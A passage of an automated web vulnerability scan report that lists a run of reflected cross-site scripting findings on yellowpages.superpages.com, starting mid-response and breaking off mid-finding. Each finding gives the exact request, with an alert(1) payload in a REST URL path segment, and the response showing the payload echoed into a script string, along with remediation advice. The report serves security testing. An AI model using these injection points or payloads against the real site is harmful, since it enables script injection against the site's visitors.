Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:06 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.581. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa201"-alert(1)-"737b17cce6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/spflyouts.1.0.cssfa201&quot;-alert(1)-&quot;737b17cce6d
Server: Unspecified
Set-Cookie: JSESSIONID=69DC6403BFC862BADBDF43AFF539343B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:14 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.582. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53209"-alert(1)-"19f62aec85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common53209"-alert(1)-"19f62aec85/css/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common53209&quot;-alert(1)-&quot;19f62aec85/css/sppromoads.css
Server: Unspecified
Set-Cookie: JSESSIONID=8E8F60E769287FC4C64A66BDCBA5CF11; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:45 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common53209"-alert(1)-"19f62aec85/css/sppromoads.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.583. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c53f7"-alert(1)-"f0b92738dcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssc53f7&quot;-alert(1)-&quot;f0b92738dcd/sppromoads.css
Server: Unspecified
Set-Cookie: JSESSIONID=85975BEBF5BE4BEC0876302A028AEC4B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:54 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.584. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6905"-alert(1)-"628f1c95393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/sppromoads.cssc6905&quot;-alert(1)-&quot;628f1c95393
Server: Unspecified
Set-Cookie: JSESSIONID=D69C3C5699393247BF29AC6893B9AA7D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:01 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.585. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4770c"-alert(1)-"4414bf7cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common4770c"-alert(1)-"4414bf7cc3/css/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common4770c&quot;-alert(1)-&quot;4414bf7cc3/css/structure.css
Server: Unspecified
Set-Cookie: JSESSIONID=B3A85C1803D19FCD2490D1349686EC11; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:26 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common4770c"-alert(1)-"4414bf7cc3/css/structure.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.586. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee76"-alert(1)-"0d4decbeb19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssdee76"-alert(1)-"0d4decbeb19/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssdee76&quot;-alert(1)-&quot;0d4decbeb19/structure.css
Server: Unspecified
Set-Cookie: JSESSIONID=ABCC92F3BBD93E038D6DE273AA54967F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:33 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssdee76"-alert(1)-"0d4decbeb19/structure.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.587. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1738"-alert(1)-"099ed66255a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/structure.cssb1738"-alert(1)-"099ed66255a HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/structure.cssb1738&quot;-alert(1)-&quot;099ed66255a
Server: Unspecified
Set-Cookie: JSESSIONID=E9374EE61141A9229E321BCE1DD67FDA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:41 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/structure.cssb1738"-alert(1)-"099ed66255a?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.588. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992a6"-alert(1)-"25f8f156e7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common992a6"-alert(1)-"25f8f156e7b/css/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common992a6&quot;-alert(1)-&quot;25f8f156e7b/css/styles.css
Server: Unspecified
Set-Cookie: JSESSIONID=3211127661936C99371FE25634686EA3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:58 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common992a6"-alert(1)-"25f8f156e7b/css/styles.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.589. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd028"-alert(1)-"da24c435281 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssdd028"-alert(1)-"da24c435281/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssdd028&quot;-alert(1)-&quot;da24c435281/styles.css
Server: Unspecified
Set-Cookie: JSESSIONID=8987766902F63B3992E6CA214283A0CE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:06 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssdd028"-alert(1)-"da24c435281/styles.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.590. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e49"-alert(1)-"cece7288702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/styles.css67e49"-alert(1)-"cece7288702 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/styles.css67e49&quot;-alert(1)-&quot;cece7288702
Server: Unspecified
Set-Cookie: JSESSIONID=3D234B69705369EA8A13C831B4DC2D38; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:15 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/styles.css67e49"-alert(1)-"cece7288702?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.591. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd884"-alert(1)-"66558d398fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commondd884"-alert(1)-"66558d398fa/css/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commondd884&quot;-alert(1)-&quot;66558d398fa/css/typography.css
Server: Unspecified
Set-Cookie: JSESSIONID=8C9E587A9A2B11245C4CB313D66A5039; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commondd884"-alert(1)-"66558d398fa/css/typography.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.592. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cec5"-alert(1)-"d776eed8f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css6cec5"-alert(1)-"d776eed8f91/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css6cec5&quot;-alert(1)-&quot;d776eed8f91/typography.css
Server: Unspecified
Set-Cookie: JSESSIONID=0FE3B1548143B2CCE3AB4A9092140C80; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:37 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css6cec5"-alert(1)-"d776eed8f91/typography.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.593. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c512b"-alert(1)-"208ebd640d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/typography.cssc512b"-alert(1)-"208ebd640d3 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/typography.cssc512b&quot;-alert(1)-&quot;208ebd640d3
Server: Unspecified
Set-Cookie: JSESSIONID=BE70921D9EFA0EDB349E547050E51902; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:45 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/typography.cssc512b"-alert(1)-"208ebd640d3?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.594. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1603f"-alert(1)-"7b40bab0d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common1603f&quot;-alert(1)-&quot;7b40bab0d58/js/alertcommon.js
Server: Unspecified
Set-Cookie: JSESSIONID=31374E21CBB6E62331151FDD9D287B6E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:30 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.595. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

